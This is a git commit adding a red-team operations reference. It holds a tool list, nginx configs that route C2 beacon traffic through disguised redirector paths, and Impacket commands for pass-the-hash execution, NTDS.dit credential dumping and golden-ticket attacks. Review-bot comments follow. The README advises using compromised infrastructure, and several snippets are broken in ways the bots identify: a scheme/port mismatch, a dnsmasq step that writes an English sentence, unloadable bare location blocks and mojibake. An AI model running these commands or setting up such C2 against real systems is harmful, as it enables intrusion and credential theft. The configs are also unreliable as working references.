commit 10a96543ad294b99aed5a5b3230c5626706720c7 Author: Hermes Agent Date: Fri May 8 18:07:45 2026 -0500 Initial commit: GreySec red team tooling reference diff --git a/README.md b/README.md new file mode 100644 index 0000000..1693d7f --- /dev/null +++ b/README.md @@ -0,0 +1,61 @@ +# GreySec Red Team Tools + +Documentation and operational notes for red team tooling used in GreySec engagements. + +## Core C2 Framework + +| Tool | Purpose | Key Modules | +|------|---------|-------------| +| Metasploit | Exploitation, pivoting | meterpreter, shell sessions | +| Covenant | .NET C2 | Grunt, pivot listeners | +| Sliver |golang C2 | beacons, session management | + +## Network Reconnaissance + +| Tool | Purpose | +|------|---------| +| nmap | Port scanning, service detection | +| BloodHound | AD enumeration | +| CrackMapExec | Network pentest automation | + +## Credential Attacks + +| Tool | Purpose | +|------|---------| +| Hashcat | Password cracking | +| John | Credential attacks | +| mimikatz | LSASS, credential extraction | + +## Lateral Movement + +| Tool | Purpose | +|------|---------| +| Impacket | SMB, WMI, DCOM execution | +| Evil-WinRM | WinRM shell access | +| psexec.py | Remote service execution | + +## Persistence + +| Tool | Purpose | +|------|---------| +| CrackMapExec | Admin persistence | +| mimikatz | Credential dumping | +| WCE | Windows credential editor | + +## Exfiltration + +| Tool | Purpose | +|------|---------| +| Cobalt Strike | Data exfiltration | +| DNS-over-HTTPS tunnel | Covert exfil | +| Staged payloads | Encrypted channels | + +## Operational Security + +- All tools must be run through a redirector (nginx/apache) +- Use compromised infrastructure when possible +- OPSEC-check before every action + +## Setup + +See individual tool directories for installation and configuration. \ No newline at end of file diff --git a/c2-redirectors.md b/c2-redirectors.md new file mode 100644 index 0000000..e089c30 --- /dev/null +++ b/c2-redirectors.md 
@@ -0,0 +1,80 @@ +# C2 Redirectors (nginx) + +## Purpose + +Redirectors proxy C2 traffic through legitimate-looking infrastructure to hide the actual C2 server. + +## Setup (nginx on Debian/Ubuntu) + +```bash +# Install +apt install nginx openssl + +# For HTTPS redirectors, get a cert: +certbot --nginx -d redirector.example.com +``` + +## HTTP Redirector Config + +```nginx +server { + listen 80; + server_name redirector.example.com; + + location / { + return 301 https://legitimate-site.com$request_uri; + } +} + +server { + listen 443 ssl; + server_name redirector.example.com; + + ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem; + + location /static { + proxy_pass https://legitimate-site.com; + proxy_set_header Host legitimate-site.com; + } + + # C2 traffic goes to actual C2 + location /jquery-3.6.0.min.js { + proxy_pass http://10.0.0.5:8080; + } +} +``` + +## Cobalt Strike Redirector + +```nginx +# For Cobalt Strike C2, route traffic based on URI +location /jquery-3.6.0.min.js { + proxy_pass http://c2-server:80; + proxy_set_header Host staging.hoolulu.com; +} +``` + +## Sliver Redirector + +```nginx +# Sliver uses HTTPS with specific paths +location /api/v2/status { + proxy_pass http://sliver-server:443; +} +``` + +## DNS Redirector (for DNS C2) + +```bash +# Setup DNS with dnsmasq +echo "A record pointing to your C2 IP" >> /etc/dnsmasq.d/c2.conf +systemctl restart dnsmasq +``` + +## Operational Notes + +- Use CDN domains when possible (CloudFlare, Akamai) +- Separate redirectors per operation +- Log everything for attribution if needed +- Test redirects before engagement \ No newline at end of file diff --git a/impacket-reference.md b/impacket-reference.md new file mode 100644 index 0000000..409c5f2 --- /dev/null +++ b/impacket-reference.md 
@@ -0,0 +1,71 @@ +# Impacket Usage Reference + +## Overview + +Impacket is a collection of Python classes for working with network protocols. Core tool for Windows pentesting. + +## Installation + +```bash +pip install impacket +# Or from source: +git clone https://github.com/fortra/impacket +cd impacket && pip install . +``` + +## Key Scripts + +### Remote Execution + +```bash +# psexec.py - Pass-the-Hash +python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm + +# wmiexec.py - Stealth WMI exec +python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm + +# atexec.py - Scheduled task exec +python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm +``` + +### Credential Extraction + +```bash +# secretsdump.py - NTDS.dit extraction +python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm + +# mimikatz.py - Remote mimikatz +python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm +``` + +### Kerberos Attacks + +```bash +# getTGT.py - Ticket extraction +python3 getTGT.py DOMAIN/user:password + +# goldenPac.py - Golden ticket + auto-exec +python3 goldenPac.py DOMAIN/user@target.lan +``` + +### Network Discovery + +```bash +# smbclient.py - Anonymous SMB share browsing +python3 smbclient.py DOMAIN/user@target.lan + +# rpcclient.py - RPC bindè”· +python3 rpcclient.py target.lan -N +``` + +## OPSEC Notes + +- wmiExec leaves fewer artifacts than psexec +- Use -dc-ip for Kerberoasting +- secretsdump requires domain admin or NTDS.dit access +- Always check firewall rules before port scanning + +## GreySec Engagement Notes + +Used in: `exploit-pipeline` for lateral movement automation. +See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline \ No newline at end of file
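Review bot: in the README.md hunk the Persistence table re-lists tools already covered elsewhere under descriptions that do not match (CrackMapExec is "Network pentest automation" under Network Reconnaissance and "Admin persistence" under Persistence; mimikatz is under Credential Attacks and again under Persistence as "Credential dumping", which is not persistence), so the rows should be reconciled or the section dropped. Smaller points in the same hunk: the Sliver row `| Sliver |golang C2 |` is missing the space after the pipe that every other cell has; "Staged payloads | Encrypted channels" in the Exfiltration table names a technique rather than a tool and does not fit a Tool/Purpose table; the Setup section says "See individual tool directories for installation and configuration" but this commit adds only three markdown files and no directories, so that sentence should point at `c2-redirectors.md` and `impacket-reference.md` or be removed; and the file lacks a trailing newline (`\ No newline at end of file`).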
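Review bot: in the c2-redirectors.md hunk the Sliver Redirector block uses `proxy_pass http://sliver-server:443;` while its own comment says Sliver uses HTTPS, so the scheme and the port disagree and one of them must be wrong. Further consistency problems in the same hunk: the Setup block installs only `nginx openssl` and then runs `certbot --nginx`, so certbot is never installed; the Cobalt Strike and Sliver snippets are bare `location` blocks with no enclosing `server { }` context and will not load if pasted as shown, so the text should say which server block they belong in; and the DNS Redirector step `echo "A record pointing to your C2 IP" >> /etc/dnsmasq.d/c2.conf` appends an English sentence, not a dnsmasq directive, so it should be marked as a placeholder rather than presented as a working command. The file also ends without a trailing newline.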
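Review bot: in the impacket-reference.md hunk the comment `# rpcclient.py - RPC bindè”·` contains mojibake; the stray bytes after "bind" should be removed and the comment finished. Also in this hunk: `smbclient.py DOMAIN/user@target.lan` is labelled "Anonymous SMB share browsing" while the command passes domain credentials, so the comment and the command contradict each other; the OPSEC note "Use -dc-ip for Kerberoasting" refers to something no entry in the Kerberos Attacks section covers, so it reads as orphaned; "wmiExec" in the OPSEC notes does not match the `wmiexec.py` spelling used in the Remote Execution block; and the file ends without a trailing newline (`\ No newline at end of file`), as do the other two files in this commit.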